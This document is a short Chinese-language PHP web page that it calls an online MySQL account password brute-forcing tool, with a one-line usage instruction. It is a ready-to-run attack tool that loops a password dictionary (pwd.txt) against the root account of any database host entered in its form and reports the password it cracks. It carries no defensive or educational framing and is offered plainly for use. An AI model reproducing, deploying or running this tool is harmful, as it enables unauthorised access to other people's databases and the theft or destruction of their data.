用法:保存为Completion.php文件,将密码字典放置同目录下为pwd.txt文件,浏览器打开就可使用。
<html>
<head>
<title>Mysql账号密码在线爆破工具</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head>
<body>
<center>
<br><br>
<h1>Mysql账号密码在线爆破工具 V2.0</h1>
<br>
<?php
if(@$_POST['submit']){
$host = @$_POST['host'];
if($host!==""){
$username = "root";//用户名字典
$password = array();
$filename = "pwd.txt"; //同目录下密码字典
$i=0;
$file = fopen($filename,'r');
while(! feof($file)){
$password[$i] = fgets($file);
$i++;
}
fclose($file);
echo "<hr><br>-----------------------爆破状态-----------------------<br>";
for ($l=0; $l <= count($password); $l++) {
$password1 = trim($password[$l]); //除去左右空白
if(@mysql_connect($host, $username, $password1)){
echo "<script>alert('数据库密码为:{$password1}')</script>";
echo "<br><br><font color='red'>爆破成功--密码-->".@$password1."</font>";
break;
}else{
continue;
}
}
echo "<br>----------------------爆破结束-----------------------<br><hr>";
}else{
echo "<script>alert('黑客,输入数据库IP地址')</script>";
}
}
?>
<br><br><br><br>
<form action="Completion.php" method="post">
数据库IP地址:<input type="text" name="host"/>
<input type="submit" value="爆破" name="submit"/>
</form>
<center>
</body>
</html>